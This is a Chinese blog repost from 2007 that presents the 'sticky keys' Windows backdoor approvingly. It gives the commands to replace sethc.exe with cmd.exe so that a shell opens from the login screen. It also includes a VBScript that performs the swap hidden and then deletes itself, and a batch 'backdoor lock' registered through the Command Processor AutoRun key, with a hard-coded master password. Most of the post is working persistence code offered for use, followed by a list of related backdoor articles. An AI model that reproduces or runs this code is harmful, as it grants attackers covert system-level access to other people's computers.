最酷的windows后门 呵呵

转载 2007年10月10日 11:30:00

在windows 2000/xp/vista下,按shift键5次,可以打开粘置,会运行sethc.exe,而且,在登录界面里也可以打开。这就让人联想到WINDOWS的屏保,将程序替换成cmd.exe后,就可以打开shell了。

参考McafeeAvertLabs:
http://feeds.feedburner.com/~r/McafeeAvertLabsBlog/~3/101149799/

XP:
将安装源光盘弹出(或将硬盘上的安装目录改名)
cd %widnir%/system32/dllcache
ren sethc.exe *.ex~
cd %widnir%/system32
copy /y cmd.exe sethc.exe

VISTA:
takeown /f c:/windows/system32/sethc.exe
cacls c:/windows/system32/sethc.exe /G administrator:F
然后按XP方法替换文件

在登录界面按5此SHIFT,出来cmd shell,然后……

后门扩展:

转至:7j blog http://1v1.name/show-241-1.html#cm300

再更新一下
Dim obj, success
Set obj = CreateObject("WScript.Shell")
success = obj.run("cmd /c takeown /f %SystemRoot%/system32/sethc.exe", 0, True)
success = obj.run("cmd /c echo y| cacls %SystemRoot%/system32/sethc.exe /G %USERNAME%:F", 0, True)
success = obj.run("cmd /c copy %SystemRoot%/system32/cmd.exe %SystemRoot%/system32/acmd.exe", 0, True)
success = obj.run("cmd /c copy %SystemRoot%/system32/sethc.exe %SystemRoot%/system32/asethc.exe", 0, True)
success = obj.run("cmd /c del %SystemRoot%/system32/sethc.exe", 0, True)
success = obj.run("cmd /c ren %SystemRoot%/system32/acmd.exe sethc.exe", 0, True)

第二句最有意思了.嘿嘿..自运应答....以前就遇到过类似的问题

再更新.加个自删除,简化代码...
On Error Resume Next
Dim obj, success
Set obj = CreateObject("WScript.Shell")
success = obj.run("cmd /c takeown /f %SystemRoot%/system32/sethc.exe&echo y| cacls %SystemRoot%/system32/sethc.exe /G %USERNAME%:F&copy %SystemRoot%/system32/cmd.exe %SystemRoot%/system32/acmd.exe&copy %SystemRoot%/system32/sethc.exe %SystemRoot%/system32/asethc.exe&del %SystemRoot%/system32/sethc.exe&ren %SystemRoot%/system32/acmd.exe sethc.exe", 0, True)
CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)

后门锁扩展:

allyesno注:可以采用cmd 锁 来进行cmdshell的密码验证 嘿嘿。。。

用下面的后门锁的方法是 把代码保存为bdlock.bat

然后修改注册表位置即可

[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Command Processor]
"AutoRun"="bdlock.bat"

@Echo Off
title 后门登陆验证
color a
cls
set temprandom=%RANDOM%
echo 请输入验证码:%temprandom%
set/p check=
if "%check%"=="%temprandom%%temprandom%" goto passcheck
if "%check%"=="%temprandom%" (
rem 后门服务器验证
rem
 如果没有后门验证服务器请rem注释掉下一行代码
if exist /192.168.8.8/backdoor$/pass goto passcheck
)
echo 验证失败
pause
exit
:passcheck
echo 验证成功
If "%passcmdlock%"=="http://blog.csdn.net/freexploit/" Goto endx
Set passcmdlock=http://blog.csdn.net/freexploit/
:allyesno
Set Errorlevel=>nul
Echo 请输入验证密码?
Set password=allyesno Is a pig>nul
Set/p password=
rem 万能密码
if "%password%"=="allyesno is a sb" goto endx
If %time:~1,1%==0 Set timechange=a
If %time:~1,1%==1 Set timechange=b
If %time:~1,1%==2 Set timechange=c
If %time:~1,1%==3 Set timechange=d
If %time:~1,1%==4 Set timechange=e
If %time:~1,1%==5 Set timechange=f
If %time:~1,1%==6 Set timechange=g
If %time:~1,1%==7 Set timechange=h
If %time:~1,1%==8 Set timechange=i
If %time:~1,1%==9 Set timechange=j
set/a sum=%time:~1,1%+%time:~1,1%
Set password|findstr "^password=%timechange%%time:~1,1%%date:~8,2%%sum%$">nul 
If "%errorlevel%"=="0" cls&Echo 口令正确&Goto End
Echo 请联系瑞星客服咨询正确密码!&Goto allyesno
:End
Set password=>nul
Set Errorlevel=>nul
Echo 很好,很和谐!
:endx
 

最酷的windows后门 呵呵

后门原理: 转至:小章 blog http://blog.csdn.net/scz123/archive/2007/03/14/1528695.aspx在windows 2000/xp/vista下,...
  • freexploit
  • freexploit
  • 2007-08-24 00:32:00
  • 6394

最酷的windows后门 呵呵

在windows 2000/xp/vista下,按shift键5次,可以打开粘置,会运行sethc.exe,而且,在登录界面里也可以打开。这就让人联想到WINDOWS的屏保,将程序替换成cmd.exe...
  • SysProgram
  • SysProgram
  • 2013-07-31 12:01:23
  • 947

最酷的windows后门

后门原理: 转至:小章 blog http://blog.csdn.net/scz123/archive/2007/03/14/1528695.aspx在windows 2000/xp/vista下,...
  • menuconfig
  • menuconfig
  • 2007-10-15 11:21:00
  • 1551

最酷的windows后门

在windows 2000/xp/vista下,按shift键5次,可以打开粘置,会运行sethc.exe,而且,在登录界面里也可以打开。这就让人联想到WINDOWS的屏保,将程序替换成cmd.exe...
  • killer000777
  • killer000777
  • 2007-10-17 15:52:00
  • 1176

python编写简单后门程序(支持windows和linux且不乱码)

虽然不是自己写的,但是改了两个部分,网上发的这个,quit退出功能无法使用,因为传过来的字符串其实是加了\n的,为了更人性化,我加了去空格。 第二个部分就是windows下的乱码问题,这里我先用了d...
  • bwlab
  • bwlab
  • 2016-12-04 18:28:56
  • 7773

用15行perl打造win32下的简易后门 python

转至非安全 pythonhttp://www.nohack.cn/bbs/dispbbs.asp?boardID=13ID=551page=1用nc连,使用了简易的管道命令(``)使之能执行基本的...
  • freexploit
  • freexploit
  • 2005-02-21 03:35:00
  • 1721

Metasploit使用后门程序渗透Windows

终端中运行  veil-evasion 输入list查看可用模块  这里使用    7)      c/shellcode_inject/flatc 输入 use 7 generate 1 (defa...
  • Three_fish
  • Three_fish
  • 2015-09-11 08:45:51
  • 1570

入侵电脑留后门

从某种意义上说,服务器被攻击是不可避免的,甚至被控制也情有可原。但绝对不能容忍的是,服务器被植入后门,攻击者如入无人之境,而管理者去浑然不觉。本文将对当前比较流行的后门技术进行解析,知己知彼方能杜绝后...
  • powmxypow
  • powmxypow
  • 2012-12-15 15:37:57
  • 6665

一个Shift的后门程序,可以让你可以进入你不知道密码的电脑

1.前提 你可以在平时亲身接触状态电脑,哪怕是在电脑主人不在的时候(虽然主人不在,或者关机了,进入电脑是要密码的)。 2.原理 利用电脑连续按5次Shift会触发粘滞键,它会运行c:\winows\s...
  • yakson
  • yakson
  • 2013-08-01 09:41:50
  • 19144

windows下后门技术(netcat篇)

由于这次ctf的失利,来补习一下知识吧!windows下后门环境 win7 nc.exe假设用administrator登陆用nc创建了一个后门,Netcat 功能比较单一, 缺少了许多我们渗透工作...
  • d_0xff
  • d_0xff
  • 2016-05-25 23:47:13
  • 6256
收藏助手
不良信息举报
您举报文章:最酷的windows后门 呵呵
举报原因:
原因补充:

(最多只允许输入30个字)